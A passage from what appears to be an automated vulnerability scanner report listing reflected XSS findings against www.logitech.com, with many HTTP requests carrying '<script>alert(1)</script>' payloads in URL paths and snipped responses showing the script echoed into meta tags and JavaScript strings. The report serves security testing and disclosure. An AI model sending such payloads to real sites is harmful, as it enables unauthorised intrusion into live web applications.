Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /8cf7b</script><script>alert(1)</script>5f3bd9197d2/30737/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:16 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','8cf7b</script><script>alert(1)</script>5f3bd9197d2/30737' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.
...[SNIP]...

1.52. http://www.logitech.com/assets/30737/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/30737/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8fa4"><script>alert(1)</script>2bfbd23abf8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /b8fa4"><script>alert(1)</script>2bfbd23abf8/30737/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:07 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="b8fa4"><script>alert(1)</script>2bfbd23abf8/30737">
...[SNIP]...

1.53. http://www.logitech.com/assets/30814/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/30814/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 873d6"><script>alert(1)</script>9ec4963de81 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /873d6"><script>alert(1)</script>9ec4963de81/30814/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:22 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="873d6"><script>alert(1)</script>9ec4963de81/30814">
...[SNIP]...

1.54. http://www.logitech.com/assets/30814/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/30814/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c3259</script><script>alert(1)</script>3a9e91f1d98 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /c3259</script><script>alert(1)</script>3a9e91f1d98/30814/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:30 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','c3259</script><script>alert(1)</script>3a9e91f1d98/30814' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.
...[SNIP]...

1.55. http://www.logitech.com/assets/31147/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/31147/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8cbf7"><script>alert(1)</script>9dbad03446c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /8cbf7"><script>alert(1)</script>9dbad03446c/31147/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:22 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="8cbf7"><script>alert(1)</script>9dbad03446c/31147">
...[SNIP]...

1.56. http://www.logitech.com/assets/31147/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/31147/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dfec6</script><script>alert(1)</script>6b1531269f5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /dfec6</script><script>alert(1)</script>6b1531269f5/31147/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:30 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','dfec6</script><script>alert(1)</script>6b1531269f5/31147' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.
...[SNIP]...

1.57. http://www.logitech.com/assets/31148/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/31148/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f8154</script><script>alert(1)</script>000448d7f83 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /f8154</script><script>alert(1)</script>000448d7f83/31148/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:34 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','f8154</script><script>alert(1)</script>000448d7f83/31148' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.
...[SNIP]...

1.58. http://www.logitech.com/assets/31148/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/31148/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64dd6"><script>alert(1)</script>88847320300 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /64dd6"><script>alert(1)</script>88847320300/31148/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:26 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="64dd6"><script>alert(1)</script>88847320300/31148">
...[SNIP]...

1.59. http://www.logitech.com/assets/31151/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/31151/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d3e90</script><script>alert(1)</script>8c4d73a7c92 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /d3e90</script><script>alert(1)</script>8c4d73a7c92/31151/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','d3e90</script><script>alert(1)</script>8c4d73a7c92/31151' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.
...[SNIP]...

1.60. http://www.logitech.com/assets/31151/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/31151/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 138f5"><script>alert(1)</script>41212ac5e5d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /138f5"><script>alert(1)</script>41212ac5e5d/31151/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:23 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="138f5"><script>alert(1)</script>41212ac5e5d/31151">
...[SNIP]...

1.61. http://www.logitech.com/assets/31156/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/31156/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e76ed</script><script>alert(1)</script>0a7cb6d3eaa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /e76ed</script><script>alert(1)</script>0a7cb6d3eaa/31156/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:26 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','e76ed</script><script>alert(1)</script>0a7cb6d3eaa/31156' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.
...[SNIP]...

1.62. http://www.logitech.com/assets/31156/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/31156/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44030"><script>alert(1)</script>758a22a1891 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /44030"><script>alert(1)</script>758a22a1891/31156/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:18 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="44030"><script>alert(1)</script>758a22a1891/31156">
...[SNIP]...

1.63. http://www.logitech.com/assets/31159/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/31159/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9ff0c</script><script>alert(1)</script>cd569d55617 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /9ff0c</script><script>alert(1)</script>cd569d55617/31159/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','9ff0c</script><script>alert(1)</script>cd569d55617/31159' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.
...[SNIP]...

1.64. http://www.logitech.com/assets/31159/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/31159/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72107"><script>alert(1)</script>dc267133a52 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /72107"><script>alert(1)</script>dc267133a52/31159/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:14 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="72107"><script>alert(1)</script>dc267133a52/31159">
...[SNIP]...

1.65. http://www.logitech.com/assets/31161/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/31161/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8b388</script><script>alert(1)</script>2fdf704614a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /8b388</script><script>alert(1)</script>2fdf704614a/31161/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:22 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','8b388</script><script>alert(1)</script>2fdf704614a/31161' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.
...[SNIP]...

1.66. http://www.logitech.com/assets/31161/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/31161/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d5a8"><script>alert(1)</script>e902e39d808 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /9d5a8"><script>alert(1)</script>e902e39d808/31161/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:12 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="9d5a8"><script>alert(1)</script>e902e39d808/31161">
...[SNIP]...

1.67. http://www.logitech.com/assets/31162/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/31162/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74280</script><script>alert(1)</script>625fc2ddf1b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /74280</script><script>alert(1)</script>625fc2ddf1b/31162/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:25 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','74280</script><script>alert(1)</script>625fc2ddf1b/31162' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.
...[SNIP]...

1.68. http://www.logitech.com/assets/31162/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/31162/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9b4e"><script>alert(1)</script>56ef9aed460 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /b9b4e"><script>alert(1)</script>56ef9aed460/31162/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:18 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="b9b4e"><script>alert(1)</script>56ef9aed460/31162">
...[SNIP]...

1.69. http://www.logitech.com/assets/31163/ [REST URL parameter 1]

